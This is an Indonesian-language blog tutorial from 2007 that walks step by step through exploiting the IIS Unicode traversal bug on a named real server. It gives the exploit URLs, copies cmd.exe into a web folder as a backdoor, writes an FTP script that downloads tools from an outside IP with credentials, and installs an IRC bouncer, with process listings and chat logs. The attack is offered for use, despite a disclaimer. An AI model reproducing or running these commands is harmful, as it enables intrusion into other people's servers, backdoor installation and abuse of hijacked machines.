Tutor ini hanya untuk tujuan mencerdaskan anak bangsa, segala resiko yg terjadi bukan tanggung
jawab penulis. Dan penulis asumsikan saudara udah mengerti benar ttg bug yg dah lama ini
(Unicode), sebenarnya masih bnyak cara lain selain memanfaatkan bug Unicode pada server IIS.
..:: TOOLZ ::..
- Pertama-pertama siapkan rokok, makanan yg secukupnya kalo bisa ce cakep huaaa ini pembawa
inspirasi
- IIS Scanner ( Untuk mencari Hole Pada Web Server yg mungkin Vulrnerable ), gw biasanya pake cgi/iis scanner 4.0 - IIS Scanner 2002 by schiczho Thx for tools, IISTESO.C ini juga nice bgt.
- List dari web target paling cepat cari di msn.net keyword " IIS 4.0 Server" hehe disana
gudangnya.
- PSKILL.EXE ( Untuk KILL Proses di OS Windows), PSLIST.EXE (Untuk Proses List yg sedang jalan)
- BNC.EXE dan BNC.CFG sendiri untuk file bouncernya sendiri. File ini bisa didapatkan pada
server ftp yg emang gw sengaja upload untuk dipakai bersama. PERHATIAN!!! Bagi tangan jahil
aku harap username dan password pada server ftp yg gw masukin pada tutor ini jangan diganti
biar kita semua bisa pake. gw percaya ama kalian semua.
..:: LANGKAH-LANGKAH ::..
- Setelah anda mendapatkan targetnya misalnya "http://www.hefele.sulinet.hu" scan dulu targetnya untuk mencari unicode yg kira-kira bisa dipakai untuk mengupload file nya.
- Dari hasil scan target tadi saya dapatkan bug berikut :
"http://www.hefele.sulinet.hu/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\"
Tapi untuk memperpendek bug nya atau kata lain kita buat backdoor untuk antisipasi, copiin
file cmd.exe ke folder yg kira² bisa dibuka lewat komputer luar. Dari sekian folder yg bisa
diakses ada tiga folder yg benar² enak and mantabz bo untuk dipasangin backdoor yakni :
../scripts <== biasanya di C:\Inetpub\Scripts\
../MSADC <== biasanya di C:\Progra~1\Common~1\System\MSADC\
../iisadmpwd <== biasanya di C:\Winnt\System32\Inetsrv\iisadmpwd\
Anda bisa memilih salah satu dari ketiga folder tersebut untuk memasang backdoor untuk
melanjutkan misi kita. Ok kita pilih folder scripts aja karena pathnya paling pendek, pada
browser ketikkan ini :
"http://www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\admin.exe"
sekarang kita punya backdoor untuk akses isi servernya yakni :
"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir+c:\"
Dari link ini kita lanjutin misi kita, copiin file ftp.exe ke folder scripts juga untuk
mengupload file bnc kita ntar. Santai Dulz gw sambilan menghayal nih hehehe kapan ya kuliah
gw selesai hikz cedih deh gw....
caranya sama kayak copy cmd.exe tadi kayak dibawah ini dudulz ah
"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+copy+c:\winnt\system32\ftp.exe+c:\inetpub\scripts\"
Setelah itu buat script dibawah ini dengan command echo.. scriptnya kayak ini :
echo+open+209.202.197.150>>+c:\ftp.txt
echo+bncfile>>+c:\ftp.txt
echo+masukaja>>+c:\ftp.txt
echo+bin>>+c:\ftp.txt
echo+cd+bnc>>+c:\ftp.txt
echo+get+bnc.exe>>+c:\ftp.txt
echo+get+PSLIST.EXE>>+c:\ftp.txt
echo+get+PSKILL.EXE>>+c:\ftp.txt
echo+ascii>>+c:\ftp.txt
echo+get+bnc.cfg>>+c:\ftp.txt
echo+bye>>+c:\ftp.txt
Gw anggap semua dah tau cara buat scriptnya dengan command echo, kalo belum au ah gelapzzz...
setelah script nya jadi pastiin dulu isi scriptsnya benar,dengan command type seperti dibawah ini :
"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+type+c:\ftp.txt"
pastiin isi script nya seperti ini
open 209.202.197.150
bncfile
masukaja
bin
cd bnc
get bnc.exe
get PSLIST.EXE
get PSKILL.EXE
ascii
get bnc.cfg
bye
Kalo isi scriptnya udah seperti diatas, kita bisa menjalankan scriptnya dengan command brkt :
"http://www.hefele.sulinet.hu/scripts/ftp.exe?-s:c:\ftp.txt"
Clink... file bnc kita berikut tools nya udah ada di "C:\Inetpub\Scripts\" Kalo gak percaya
liat aja sendiri pake command dir (semuanya command DOS murni kok) gini loh dulz :
"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir"
Kalo file nya dah ada, bnc nya cukup kita jalanin lewat browser kayak gini :
"http://www.hefele.sulinet.hu/scripts/bnc.exe"
Biasanya akan keluar keterangan bahwa bnc nya dah aktif, tapi untuk lebih memastikan bahwa
BNC kamu jalan pake tools PSLIST untuk melihat prosesnya
"http://www.hefele.sulinet.hu/scripts/PSLIST.EXE"
akan tampil seperti ini :
Process information for SZERVER:
Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time
Idle 0 0 1 0 16 0:00:00.000 661:34:23.153 0:00:00.000
System 2 8 85 2610 1032 0:00:00.000 0:07:48.313 0:00:00.000
SMSS 25 11 6 30 0 0:00:00.090 0:00:00.070 667:57:32.790
CSRSS 33 13 7 636 1016 0:00:01.682 0:00:01.442 667:57:27.052
..
..
..
VbCons 621 8 18 212 2596 0:00:00.871 0:00:01.131 87:48:53.868
BNC 501 8 1 260 1216 0:00:00.010 0:00:00.010 0:08:56.261
PSLIST 418 8 1 299 1884 0:00:00.040 0:00:00.110 0:00:00.150
Disitu kamu bisa ngeliat BNC kamu aktif dengan nomor PID 501 , jika suatu waktu bncnya
crash kamu bisa kill prosesnya dengan command :
"http://www.hefele.sulinet.hu/scripts/PSKILL.EXE?+501" <-- syntax nya PSKILL?+PID
Untuk Lebih memastikan bnc kamu aktif dan sehat kamu coba aja connect ke web server nya
dengan mIRC atau program chat lain, misalnya pake mIRC :
"/server www.hefele.sulinet.hu 5050"
[09:06] * Connecting to www.hefele.sulinet.hu (5050)
[09:06] -www.hefele.sulinet.hu- You need to say /quote PASS
"/quote pass admin"
[09:07] -> Server: pass admin
[09:07] -www.hefele.sulinet.hu- Welcome to BNC 2.6.4-WIN, the irc proxy
[09:07] -www.hefele.sulinet.hu- Level two, lets connect to something real now
[09:07] -www.hefele.sulinet.hu- type /quote conn [server] to connect
[09:07] -www.hefele.sulinet.hu- type /quote help for basic list of commands and usage
"/quote conn tiscali.uk.eu.dal.net 8888"
[09:08] -> Server: conn tiscali.uk.eu.dal.net 8888
[09:08] -www.hefele.sulinet.hu- Making reality through tiscali.uk.eu.dal.net port 8888
[09:08] -www.hefele.sulinet.hu- Suceeded connection
Cleng..... elo dah connect ke server irc dengan IP web server yg elo pasangin BNC.
Ok deh.. cuman segini kok tutor dudulz ini, kalo yg udah bisa jgn ngolok ya ajarin dong
yg lain ilmu jangan disimpan sendiri ntar mabok elo... mabok ilmu emang enak xixixi.
Saturday, March 31, 2007
Subscribe to:
Post Comments (Atom)
1 comment:
:) hehehehe masih laku ya tutornya.. greatzz... salam kenal ya : meet me at #sysHACK@dal.net or #samarindahack@dal.net
Post a Comment